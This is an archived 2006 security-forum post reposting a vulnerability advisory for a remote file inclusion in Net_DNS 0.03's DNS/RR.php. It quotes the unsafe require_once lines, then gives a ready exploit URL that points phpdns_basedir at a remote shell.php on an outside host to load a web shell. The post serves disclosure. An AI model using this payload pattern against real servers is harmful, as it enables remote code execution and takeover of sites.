邪恶八进制信息安全团队技术讨论组's Archiver

pub!1c 2006-10-23 12:52

Net_DNS <= 0.3 (DNS/RR.php) Remote File Include Vulnerability

[code]
###### ToXiC #########################
#
# Net_DNS: Remote File Inclusion by ToXiC CreW
#
#      ToXic Security Italian CreW
#        BuG FounD by Drago84
#
# Application Affect:
#               Net_DNS-0.03
#
#
#  Sorce Code:
#         [url]http://gentoo.osuosl.org/distfiles/Net_DNS-0.03.tgz[/url]
#
#
# Page:
#      RR.php
#
#
# Dir :
#    /DNS/
#
#
#
#
# Problem:
#      /* Include files {{{ */
#      require_once("$phpdns_basedir/DNS/RR/A.php");
#      require_once("$phpdns_basedir/DNS/RR/NS.php");
#      require_once("$phpdns_basedir/DNS/RR/CNAME.php");
#        require_once("$phpdns_basedir/DNS/RR/PTR.php");
#        require_once("$phpdns_basedir/DNS/RR/SOA.php");
#        require_once("$phpdns_basedir/DNS/RR/MX.php");
#        require_once("$phpdns_basedir/DNS/RR/TSIG.php");
#      /* }}} */#
#
#
# ExPloit :
#  [url]http://www.site.com/Net_DNS_PATH/DNS/RR.php?phpdns_basedir=http://sonic-banda-di-lamer.gay/shell.php?[/url]
#
#
#
#     
# GrEatZ All Member of ToXiC, Str0ke
#
#
# FUCK #Sonic
#
###### ToXiC #########


[/code]

页: [1]
© 1999-2008 EvilOctal Security Team